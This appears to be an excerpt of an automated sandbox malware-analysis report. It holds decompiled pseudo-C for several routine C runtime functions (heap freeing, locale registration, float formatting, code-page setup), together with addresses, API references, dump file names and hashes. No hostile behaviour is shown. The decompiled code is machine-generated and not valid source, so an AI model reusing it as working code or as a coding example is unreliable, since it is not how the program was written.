0x00000000
0x00000000
0x00000000
0x0090db0c
0x0090db04
0x0090da8c
0x00000000
0x0090da80
0x0090dba4
0x00000000
0x0090dba4
0x0090da53
0x0090da48
0x0090da3d
0x0090d9f6
0x0090d9f6
0x0090d9f8
0x0090da0f
0x0090d9fa
0x0090d9fa
0x0090d9fb
0x0090d9fc
0x0090d9fd
0x0090da02
0x0090dc9a
0x0090dc9d
0x0090dc9e
0x0090dc9f
0x0090dca1
0x0090dca8
0x0090dca8
0x0090d9f4
0x00000000

APIs

Part of subcall function 0091062B: RtlAllocateHeap.NTDLL(00000000,?,?,?,00905E75,?,?,?,?,?,00901137,?,?), ref: 0091065D

_free.LIBCMT ref: 0090D93F
_free.LIBCMT ref: 0090D956
_free.LIBCMT ref: 0090D973
_free.LIBCMT ref: 0090D98E
_free.LIBCMT ref: 0090D9A5

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 13ec07e69d962fae372068310378213924fb91801fc6d080e0e2ec857d20cdb9
Instruction ID: fba38916ac3fe798433c396ededb78da4bfbc8e30021e178fd79a42784b2d432
Opcode Fuzzy Hash: 13ec07e69d962fae372068310378213924fb91801fc6d080e0e2ec857d20cdb9
Instruction Fuzzy Hash: 8551C372A027099FDB21DFA9CC41BAAB7F9EF98720F144569E849D72D0E731DA41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00902877 Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00902877(void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				signed int* _v40;
				signed int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				void* _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t78;
				signed int _t81;
				intOrPtr* _t89;
				intOrPtr _t100;
				intOrPtr _t107;
				signed int _t111;
				void* _t112;
				signed int _t114;
				signed int _t117;
				void* _t118;
				signed int* _t119;
				signed int _t121;
				signed int* _t122;
				signed int* _t123;
				intOrPtr* _t124;
				signed int _t126;
				signed int _t128;
				signed int _t132;

				_t99 = __edx;
				_t126 = _t132;
				_t50 =  *0x92c014; // 0xb29a853a
				_v8 = _t50 ^ _t126;
				_t75 = _a4;
				E00903255( &_v12, 0);
				_t111 =  *0x959fd8; // 0x10d3d00
				_v16 = _t111;
				_t117 = E00901735(_t75, E009016A4(_t75, 0x9592f4, __edx, _t111));
				if(_t117 != 0) {
					L5:
					E009032AD( &_v12);
					_pop(_t112);
					_pop(_t118);
					_pop(_t76);
					return E0090528B(_t117, _t76, _v8 ^ _t126, _t99, _t112, _t118);
				} else {
					if(_t111 == 0) {
						_t59 = E00901775(_t75,  &_v16, _t75); // executed
						_pop(_t89);
						__eflags = _t59 - 0xffffffff;
						if(__eflags == 0) {
							E0090157A();
							asm("int3");
							_t100 = _v20;
							_t61 = _v16;
							_v36 = _t89;
							_v32 = _t100;
							_v28 = _t61;
							__eflags = _t100 - _t61;
							if(_t100 != _t61) {
								_push(_t117);
								_push(_t111);
								_t119 = _t100 + 4;
								_t114 = 1;
								_v40 = _t119;
								__eflags = _t119 - _t61;
								if(_t119 != _t61) {
									_push(_t75);
									_push(_t126);
									do {
										_t17 = _t114 + 1; // 0x2
										_t62 = _t17;
										_v44 = _t62;
										_t121 = _t62;
										do {
											_t77 = 0;
											_t128 = 0;
											__eflags = _t114;
											if(_t114 != 0) {
												_t124 = _v36;
												do {
													_t81 = (_t77 <<  *((intOrPtr*)(_t124 + 4)) - 1) + (_t77 <<  *((intOrPtr*)(_t124 + 4)) - 1);
													__eflags = _t81;
													do {
														_t70 = E00902B1C( *_t124);
														__eflags = _t70 -  *(_t124 + 8);
													} while (_t70 >  *(_t124 + 8));
													_t77 = _t81 | _t70;
													_t128 = (_t128 <<  *((intOrPtr*)(_t124 + 4)) - 0x00000001) + (_t128 <<  *((intOrPtr*)(_t124 + 4)) - 0x00000001) |  *(_t124 + 8);
													__eflags = _t128 - _t114;
												} while (_t128 < _t114);
												_t121 = _v44;
											}
											_t63 = _t128;
											_t65 = _t77;
											__eflags = _t65 / _t121 - _t63 / _t121;
											if(_t65 / _t121 >= _t63 / _t121) {
												goto L18;
											}
											break;
											L18:
											_t68 = _t128;
											__eflags = _t68 % _t121 - _t114;
										} while (_t68 % _t121 != _t114);
										_t67 = _t77;
										_t61 = _t67 / _t121;
										_t122 = _v40;
										_t78 = _t67 % _t121;
										__eflags = _t78 - _t114;
										if(_t78 != _t114) {
											_t107 = _v32;
											_t61 =  *(_t107 + _t78 * 4);
											 *_t122 = _t61;
											 *(_t107 + _t78 * 4) =  *_t122;
										}
										_t114 = _v44;
										_t123 =  &(_t122[1]);
										_v40 = _t123;
										__eflags = _t123 - _v28;
									} while (_t123 != _v28);
								}
							}
							return _t61;
						} else {
							_t117 = _v16;
							E00903559(__eflags, _t117);
							 *((intOrPtr*)( *_t117 + 4))();
							 *0x959fd8 = _t117;
							goto L5;
						}
					} else {
						_t117 = _t111;
						goto L5;
					}
				}
			}

0x00902877
0x00902878
0x0090287d
0x00902884
0x00902888
0x00902892
0x00902897
0x009028a2
0x009028b2
0x009028b6
0x009028e8
0x009028eb
0x009028f5
0x009028f6
0x009028f9
0x00902900
0x009028b8
0x009028ba
0x009028c5
0x009028cb
0x009028cc
0x009028cf
0x00902901
0x00902906
0x0090290a
0x0090290e
0x00902912
0x00902916
0x0090291a
0x0090291e
0x00902920
0x00902926
0x00902927
0x0090292a
0x0090292d
0x0090292e
0x00902932
0x00902934
0x0090293a
0x0090293b
0x0090293c
0x0090293c
0x0090293c
0x0090293f
0x00902943
0x00902945
0x00902945
0x00902947
0x00902949
0x0090294b
0x0090294d
0x00902951
0x00902957
0x00902957
0x00902959
0x0090295b
0x00902960
0x00902960
0x00902968
0x0090296f
0x00902972
0x00902972
0x00902976
0x00902976
0x0090297c
0x00902984
0x00902988
0x0090298a
0x00000000
0x00000000
0x00000000
0x0090298c
0x0090298e
0x00902992
0x00902992
0x00902996
0x0090299a
0x0090299c
0x009029a0
0x009029a2
0x009029a4
0x009029a6
0x009029ac
0x009029af
0x009029b1
0x009029b1
0x009029b4
0x009029b8
0x009029bb
0x009029bf
0x009029bf
0x009029ca
0x009029cc
0x009029d0
0x009028d1
0x009028d1
0x009028d5
0x009028df
0x009028e2
0x00000000
0x009028e2
0x009028bc
0x009028bc
0x00000000
0x009028bc
0x009028ba

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00902892

Part of subcall function 009016A4: std::_Lockit::_Lockit.LIBCPMT ref: 009016C0
Part of subcall function 009016A4: std::_Lockit::~_Lockit.LIBCPMT ref: 009016DC

std::_Facet_Register.LIBCPMT ref: 009028D5
std::_Lockit::~_Lockit.LIBCPMT ref: 009028EB
Concurrency::cancel_current_task.LIBCPMT ref: 00902901

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 782efbc79be1152f9af784c7389f4559f041ca16ce4ca67d77a281a71081e860
Instruction ID: 936d869602c36a23a09b8639aa4f0824391fbdd868647a08f60bd246a5c1a4b4
Opcode Fuzzy Hash: 782efbc79be1152f9af784c7389f4559f041ca16ce4ca67d77a281a71081e860
Instruction Fuzzy Hash: 42019635A00218EFCB14EFA99C85AAD77B8EFC4350B104559F925972D1DE34AE059750

Uniqueness

Uniqueness Score: -1.00%

Function 00909C8C Relevance: 4.6, APIs: 3, Instructions: 141
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00909C8C(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v44;
				char _v80;
				char _v84;
				void* _v93;
				char _v100;
				char _v104;
				char* _v108;
				char _v112;
				void* __ebp;
				intOrPtr* _t70;
				signed int _t71;
				char _t72;
				void* _t75;
				signed int _t80;
				signed int _t84;
				signed int _t95;
				signed int _t106;
				signed int _t110;
				void* _t111;
				char _t116;
				void* _t120;
				signed int _t125;
				signed int _t126;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t143;
				void* _t145;
				char _t155;
				intOrPtr* _t157;
				intOrPtr _t159;
				void* _t160;
				signed int _t163;
				void* _t167;
				void* _t169;
				void* _t170;
				void* _t171;

				_t153 = __edx;
				_push(__ebx);
				_push(__esi);
				_t163 = __ecx;
				_push(__edi);
				_push( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)))));
				_t70 =  *((intOrPtr*)(__ecx));
				_push( *_t70); // executed
				L21(); // executed
				_t157 = _t70;
				_pop(_t129);
				if(_t157 == 0) {
					L4:
					_t71 = 0;
					goto L5;
				} else {
					_t72 = E0090FBFC(_t129, __edx);
					_v12 = _t72;
					_t125 = 0;
					_v20 =  *((intOrPtr*)(_t72 + 0x4c));
					_t131 =  *(_t72 + 0x48);
					_v16 = _t131;
					_v8 = 0;
					_t75 = E00910C18(0, _t131, __edx,  &_v8, 0, 0, _t157, 0,  &_v20);
					_t170 = _t169 + 0x18;
					if(_t75 == 0) {
						_t126 = E0091062B(_v8 + 4);
						__eflags = _t126;
						if(_t126 == 0) {
							goto L4;
						} else {
							_t131 =  &_v20;
							_t13 = _t126 + 4; // 0x4
							_t80 = E00910C18(_t126, _t131, __edx, 0, _t13, _v8, _t157, 0xffffffff, _t131);
							_t170 = _t170 + 0x18;
							__eflags = _t80;
							if(_t80 == 0) {
								_t133 = _t131 | 0xffffffff;
								_t159 = _v20;
								_t16 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x6794e8
								__eflags =  *(_t159 + _t16 + 0x24);
								if(__eflags != 0) {
									asm("lock xadd [edx], eax");
									if(__eflags == 0) {
										_t19 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x6794e8
										E0090F884( *((intOrPtr*)(_t159 + _t19 + 0x24)));
										_pop(_t143);
										 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) =  *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) & 0x00000000;
										_t133 = _t143 | 0xffffffff;
										__eflags = _t133;
									}
								}
								_t155 = _v12;
								_t84 =  *0x92c194; // 0xfffffffe
								__eflags =  *(_t155 + 0x350) & _t84;
								if(( *(_t155 + 0x350) & _t84) == 0) {
									_t32 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x6794e8
									__eflags =  *(_t159 + _t32 + 0x24);
									if( *(_t159 + _t32 + 0x24) != 0) {
										asm("lock xadd [eax], ecx");
										__eflags = _t133 == 1;
										if(_t133 == 1) {
											_t35 = ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8; // 0x6794e8
											E0090F884( *((intOrPtr*)(_t159 + _t35 + 0x24)));
											_t95 =  *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163));
											_t37 = _t159 + 0x24 + _t95 * 8;
											 *_t37 =  *(_t159 + 0x24 + _t95 * 8) & 0x00000000;
											__eflags =  *_t37;
										}
									}
								}
								_t43 = _t159 + 0xc; // 0xb80775c0
								_t44 = _t126 + 4; // 0x4
								_t71 = _t44;
								 *_t126 =  *_t43;
								 *(_t159 + 0x24 + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8) = _t126;
								 *((intOrPtr*)(_t159 + 0x1c + ( *((intOrPtr*)( *_t163)) +  *((intOrPtr*)( *_t163))) * 8)) = _t71;
								L5:
								return _t71;
							} else {
								__eflags = _t80 - 0x16;
								if(_t80 == 0x16) {
									L19:
									_t125 = 0;
									__eflags = 0;
									goto L20;
								} else {
									__eflags = _t80 - 0x22;
									if(_t80 == 0x22) {
										goto L19;
									} else {
										E0090F884(_t126);
										goto L4;
									}
								}
							}
						}
					} else {
						if(_t75 == 0x16 || _t75 == 0x22) {
							L20:
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							_push(_t125);
							E00909AAF();
							asm("int3");
							_t167 = _t170;
							_push(_t131);
							__eflags = _v44;
							if(_v44 != 0) {
								_push(_t163);
								_push(_t157);
								_t160 = 0;
								_t106 = E00910959( &_v12, 0, 0, _a4, 0x7fffffff);
								_t171 = _t170 + 0x14;
								__eflags = _t106;
								if(_t106 == 0) {
									L26:
									_t163 = E00910679(_v12, 2);
									_pop(_t145);
									__eflags = _t163;
									if(_t163 == 0) {
										L32:
										E0090F884(_t163);
										return _t160;
									} else {
										_t110 = E00910959(_t160, _t163, _v12, _a4, 0xffffffff);
										_t171 = _t171 + 0x14;
										__eflags = _t110;
										if(_t110 == 0) {
											_t111 = E0090D7AD(_t125, _t145, _t153, _t160, _t163, _v0, _t163); // executed
											_t160 = _t111;
											goto L32;
										} else {
											__eflags = _t110 - 0x16;
											if(_t110 == 0x16) {
												goto L33;
											} else {
												__eflags = _t110 - 0x22;
												if(_t110 == 0x22) {
													goto L33;
												} else {
													goto L32;
												}
											}
										}
									}
								} else {
									__eflags = _t106 - 0x16;
									if(_t106 == 0x16) {
										L33:
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										_push(_t160);
										E00909AAF();
										asm("int3");
										_push(_t167);
										E00910593();
										_v112 =  &_v84;
										_v108 =  &_v80;
										_t116 = 4;
										_v100 = _t116;
										_v104 = _t116;
										_push( &_v100);
										_push( &_v112);
										_push( &_v104); // executed
										_t120 = E00909C31(_t125, _t160, _t163, __eflags); // executed
										return _t120;
									} else {
										__eflags = _t106 - 0x22;
										if(_t106 == 0x22) {
											goto L33;
										} else {
											goto L26;
										}
									}
								}
							} else {
								return E0090D7AD(_t125, _t131, _t153, _t157, _t163, _v0, 0);
							}
						} else {
							goto L4;
						}
					}
				}
			}

0x00909c8c
0x00909c94
0x00909c95
0x00909c96
0x00909c98
0x00909c9c
0x00909c9e
0x00909ca0
0x00909ca2
0x00909ca7
0x00909caa
0x00909cad
0x00909cf2
0x00909cf2
0x00000000
0x00909caf
0x00909caf
0x00909cb4
0x00909cb7
0x00909cbc
0x00909cbf
0x00909ccc
0x00909cd1
0x00909cd4
0x00909cd9
0x00909cde
0x00909d05
0x00909d08
0x00909d0a
0x00000000
0x00909d0c
0x00909d0c
0x00909d16
0x00909d1c
0x00909d21
0x00909d24
0x00909d26
0x00909d45
0x00909d48
0x00909d4f
0x00909d53
0x00909d55
0x00909d59
0x00909d5d
0x00909d65
0x00909d69
0x00909d70
0x00909d75
0x00909d7a
0x00909d7a
0x00909d7a
0x00909d5d
0x00909d7d
0x00909d80
0x00909d85
0x00909d8b
0x00909d93
0x00909d97
0x00909d99
0x00909d9b
0x00909d9f
0x00909da0
0x00909da8
0x00909dac
0x00909db6
0x00909db8
0x00909db8
0x00909db8
0x00909db8
0x00909da0
0x00909d99
0x00909dbd
0x00909dc0
0x00909dc0
0x00909dc3
0x00909dcb
0x00909dd5
0x00909cf4
0x00909cf8
0x00909d28
0x00909d28
0x00909d2b
0x00909dde
0x00909dde
0x00909dde
0x00000000
0x00909d31
0x00909d31
0x00909d34
0x00000000
0x00909d3a
0x00909d3b
0x00000000
0x00909d40
0x00909d34
0x00909d2b
0x00909d26
0x00909ce0
0x00909ce3
0x00909de0
0x00909de0
0x00909de1
0x00909de2
0x00909de3
0x00909de4
0x00909de5
0x00909dea
0x00909dee
0x00909df0
0x00909df1
0x00909df5
0x00909e05
0x00909e06
0x00909e0f
0x00909e17
0x00909e1c
0x00909e1f
0x00909e21
0x00909e2d
0x00909e37
0x00909e3a
0x00909e3b
0x00909e3d
0x00909e6e
0x00909e6f
0x00909e7a
0x00909e3f
0x00909e49
0x00909e4e
0x00909e51
0x00909e53
0x00909e65
0x00909e6c
0x00000000
0x00909e55
0x00909e55
0x00909e58
0x00000000
0x00909e5a
0x00909e5a
0x00909e5d
0x00000000
0x00909e5f
0x00000000
0x00909e5f
0x00909e5d
0x00909e58
0x00909e53
0x00909e23
0x00909e23
0x00909e26
0x00909e7b
0x00909e7b
0x00909e7c
0x00909e7d
0x00909e7e
0x00909e7f
0x00909e80
0x00909e85
0x00909e88
0x00909e8e
0x00909e96
0x00909ea1
0x00909ea4
0x00909ea5
0x00909ea8
0x00909eae
0x00909eb2
0x00909eb6
0x00909eb7
0x00909ebd
0x00909e28
0x00909e28
0x00909e2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00909e2b
0x00909e26
0x00909df7
0x00909e04
0x00909e04
0x00000000
0x00000000
0x00000000
0x00909ce3
0x00909cde

APIs

Part of subcall function 0090FBFC: GetLastError.KERNEL32(?,00000000,?,0090BB24,00000000,00000000,?,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC01
Part of subcall function 0090FBFC: SetLastError.KERNEL32(00000000,00000002,000000FF,?,009108B1,00000000,00000000,00000000,00000000,?), ref: 0090FC9F

_free.LIBCMT ref: 00909D3B
_free.LIBCMT ref: 00909D69
_free.LIBCMT ref: 00909DAC

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID:
API String ID: 3291180501-0
Opcode ID: 0c3e16c43883142db1c47b8d0c9d744c773a6c2add17d29b8e6aeafccd7d1a6b
Instruction ID: 0bd51c610b0df9cfdd929988cbc57948cf367e1ff35c7196ffe915cde0d2f431
Opcode Fuzzy Hash: 0c3e16c43883142db1c47b8d0c9d744c773a6c2add17d29b8e6aeafccd7d1a6b
Instruction Fuzzy Hash: C1414B716001059FDB68DFACC881AA9B3E9EF89314B240669F45AC73D2E731ED50DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00909DEB Relevance: 4.6, APIs: 3, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00909DEB(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v28;
				char _v32;
				void* _v41;
				char _v48;
				char _v52;
				char* _v56;
				char _v60;
				void* __ebp;
				void* _t20;
				void* _t24;
				void* _t25;
				char _t30;
				void* _t34;
				void* _t39;
				void* _t46;
				void* _t48;
				void* _t54;
				void* _t55;

				_t50 = __esi;
				_t36 = __ebx;
				_push(__ecx);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t48 = 0;
					_t20 = E00910959( &_v8, 0, 0, _a8, 0x7fffffff);
					_t55 = _t54 + 0x14;
					__eflags = _t20;
					if(_t20 == 0) {
						L5:
						_t50 = E00910679(_v8, 2);
						_pop(_t39);
						__eflags = _t50;
						if(_t50 == 0) {
							L11:
							E0090F884(_t50);
							return _t48;
						} else {
							_t24 = E00910959(_t48, _t50, _v8, _a8, 0xffffffff);
							_t55 = _t55 + 0x14;
							__eflags = _t24;
							if(_t24 == 0) {
								_t25 = E0090D7AD(_t36, _t39, _t46, _t48, _t50, _a4, _t50); // executed
								_t48 = _t25;
								goto L11;
							} else {
								__eflags = _t24 - 0x16;
								if(_t24 == 0x16) {
									goto L12;
								} else {
									__eflags = _t24 - 0x22;
									if(_t24 == 0x22) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					} else {
						__eflags = _t20 - 0x16;
						if(_t20 == 0x16) {
							L12:
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							_push(_t48);
							E00909AAF();
							asm("int3");
							E00910593();
							_v60 =  &_v32;
							_v56 =  &_v28;
							_t30 = 4;
							_v48 = _t30;
							_v52 = _t30;
							_push( &_v48);
							_push( &_v60);
							_push( &_v52); // executed
							_t34 = E00909C31(_t36, _t48, _t50, __eflags); // executed
							return _t34;
						} else {
							__eflags = _t20 - 0x22;
							if(_t20 == 0x22) {
								goto L12;
							} else {
								goto L5;
							}
						}
					}
				} else {
					return E0090D7AD(__ebx, __ecx, _t46, __edi, __esi, _a4, 0);
				}
			}

0x00909deb
0x00909deb
0x00909df0
0x00909df5
0x00909e05
0x00909e06
0x00909e0f
0x00909e17
0x00909e1c
0x00909e1f
0x00909e21
0x00909e2d
0x00909e37
0x00909e3a
0x00909e3b
0x00909e3d
0x00909e6e
0x00909e6f
0x00909e7a
0x00909e3f
0x00909e49
0x00909e4e
0x00909e51
0x00909e53
0x00909e65
0x00909e6c
0x00000000
0x00909e55
0x00909e55
0x00909e58
0x00000000
0x00909e5a
0x00909e5a
0x00909e5d
0x00000000
0x00909e5f
0x00000000
0x00909e5f
0x00909e5d
0x00909e58
0x00909e53
0x00909e23
0x00909e23
0x00909e26
0x00909e7b
0x00909e7b
0x00909e7c
0x00909e7d
0x00909e7e
0x00909e7f
0x00909e80
0x00909e85
0x00909e8e
0x00909e96
0x00909ea1
0x00909ea4
0x00909ea5
0x00909ea8
0x00909eae
0x00909eb2
0x00909eb6
0x00909eb7
0x00909ebd
0x00909e28
0x00909e28
0x00909e2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00909e2b
0x00909e26
0x00909df7
0x00909e04
0x00909e04

APIs

__cftoe.LIBCMT ref: 00909E17
__cftoe.LIBCMT ref: 00909E49
_free.LIBCMT ref: 00909E6F

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: __cftoe$_free
String ID:
API String ID: 1303422935-0
Opcode ID: bd0cbbf19953673770f92570d9e8b1d2c45ae28cd92fe8f8096da98fe4ab82b8
Instruction ID: 3cb832464484966fb61d30750b8ac2dcdd60fb5502daa76d4d662b520e53802a
Opcode Fuzzy Hash: bd0cbbf19953673770f92570d9e8b1d2c45ae28cd92fe8f8096da98fe4ab82b8
Instruction Fuzzy Hash: E621C472904108BEDF24EB95CC46EDF7BADDBC5760F244126F915E50C2EB31CA808AA1

Uniqueness

Uniqueness Score: -1.00%

Function 009166F6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E009166F6(void* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				char _v776;
				char _v1800;
				char _v1814;
				struct _cpinfo _v1820;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				char _t68;
				signed char _t69;
				signed int _t70;
				signed int _t80;
				signed int _t81;
				char _t82;
				signed int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				void* _t90;
				intOrPtr _t91;
				signed int _t92;

				_t60 =  *0x92c014; // 0xb29a853a
				_v8 = _t60 ^ _t92;
				_t91 = _a4;
				if( *(_t91 + 4) == 0xfde9) {
					L19:
					_t81 = 0;
					__eflags = 0;
					_t90 = 0x100;
					_t82 = 0;
					do {
						_t46 = _t82 - 0x61; // -97
						_t89 = _t46;
						_t47 = _t89 + 0x20; // -65
						__eflags = _t47 - 0x19;
						if(_t47 > 0x19) {
							__eflags = _t89 - 0x19;
							if(_t89 > 0x19) {
								_t63 = _t81;
							} else {
								 *(_t91 + _t82 + 0x19) =  *(_t91 + _t82 + 0x19) | 0x00000020;
								_t56 = _t82 - 0x20; // -32
								_t63 = _t56;
							}
						} else {
							 *(_t91 + _t82 + 0x19) =  *(_t91 + _t82 + 0x19) | 0x00000010;
							_t52 = _t82 + 0x20; // 0x20
							_t63 = _t52;
						}
						 *(_t91 + _t82 + 0x119) = _t63;
						_t82 = _t82 + 1;
						__eflags = _t82 - _t90;
					} while (_t82 < _t90);
					L26:
					return E0090528B(_t63, _t81, _v8 ^ _t92, _t89, _t90, _t91);
				}
				_t5 = _t91 + 4; // 0xe8458d00
				if(GetCPInfo( *_t5,  &_v1820) == 0) {
					goto L19;
				} else {
					_t81 = 0;
					_t90 = 0x100;
					_t68 = 0;
					do {
						 *((char*)(_t92 + _t68 - 0x104)) = _t68;
						_t68 = _t68 + 1;
					} while (_t68 < 0x100);
					_t69 = _v1814;
					_t85 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t100 = _t69;
						if(_t69 == 0) {
							break;
						}
						_t89 =  *(_t85 + 1) & 0x000000ff;
						_t70 = _t69 & 0x000000ff;
						while(1) {
							__eflags = _t70 - _t89;
							if(_t70 > _t89) {
								break;
							}
							__eflags = _t70 - _t90;
							if(_t70 >= _t90) {
								break;
							}
							 *((char*)(_t92 + _t70 - 0x104)) = 0x20;
							_t70 = _t70 + 1;
							__eflags = _t70;
						}
						_t85 = _t85 + 2;
						__eflags = _t85;
						_t69 =  *_t85;
					}
					_t14 = _t91 + 4; // 0xe8458d00
					E009133C3(_t89, _t100, _t81, 1,  &_v264, _t90,  &_v1800,  *_t14, _t81);
					_t17 = _t91 + 4; // 0xe8458d00
					_t20 = _t91 + 0x21c; // 0x42d23303
					E009136B0(_t100, _t81,  *_t20, _t90,  &_v264, _t90,  &_v520, _t90,  *_t17, _t81); // executed
					_t22 = _t91 + 4; // 0xe8458d00
					_t24 = _t91 + 0x21c; // 0x42d23303
					E009136B0(_t100, _t81,  *_t24, 0x200,  &_v264, _t90,  &_v776, _t90,  *_t22, _t81);
					_t80 = _t81;
					do {
						_t86 =  *(_t92 + _t80 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								_t87 = _t81;
							} else {
								 *(_t91 + _t80 + 0x19) =  *(_t91 + _t80 + 0x19) | 0x00000020;
								_t87 =  *((intOrPtr*)(_t92 + _t80 - 0x304));
							}
						} else {
							 *(_t91 + _t80 + 0x19) =  *(_t91 + _t80 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t92 + _t80 - 0x204));
						}
						 *(_t91 + _t80 + 0x119) = _t87;
						_t80 = _t80 + 1;
					} while (_t80 < _t90);
					goto L26;
				}
			}

0x00916701
0x00916708
0x0091670d
0x00916718
0x0091682a
0x0091682a
0x0091682a
0x0091682c
0x00916831
0x00916833
0x00916833
0x00916833
0x00916836
0x00916839
0x0091683c
0x00916848
0x0091684b
0x00916859
0x0091684d
0x00916850
0x00916854
0x00916854
0x00916854
0x0091683e
0x0091683e
0x00916843
0x00916843
0x00916843
0x0091685b
0x00916862
0x00916863
0x00916863
0x00916867
